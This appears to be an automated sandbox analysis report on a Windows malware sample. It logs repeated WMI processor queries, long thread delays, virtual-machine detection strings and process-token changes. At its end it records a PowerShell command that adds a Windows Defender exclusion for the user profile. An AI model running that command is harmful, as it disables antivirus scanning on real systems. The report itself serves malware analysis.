Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBF4720 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask, 0_2_00007FF68BBF4720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1200000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1199874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1198890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1198781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1198671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59615 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59500 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59391 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 59266 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1197828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1197718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1197609 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1196812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1196697 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Thread delayed: delay time: 1196593 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: ilasm.exe, 00000006.00000002.3898973953.000002039815A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
Source: AddInProcess.exe, 0000000E.00000002.3758797077.0000028B3C207000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: AddInProcess.exe, 0000000A.00000002.1479664899.0000015C9C6D7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.3758786261.0000017F3AB07000.00000004.00000020.00020000.00000000.sdmp, AddInProcess.exe, 0000000E.00000002.3758797077.0000028B3C207000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ilasm.exe, 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: davMCIUWmi
Source: AddInProcess.exe, 0000000A.00000002.1479664899.0000015C9C6D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: svchost.exe, 00000003.00000002.3755903104.000001BB81E2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBE5600 RtlAddVectoredExceptionHandler, 0_2_00007FF68BBE5600
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC4B544 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF68BC4B544
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A655600 RtlAddVectoredExceptionHandler, 8_2_00007FF72A655600
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A6BB544 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF72A6BB544
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
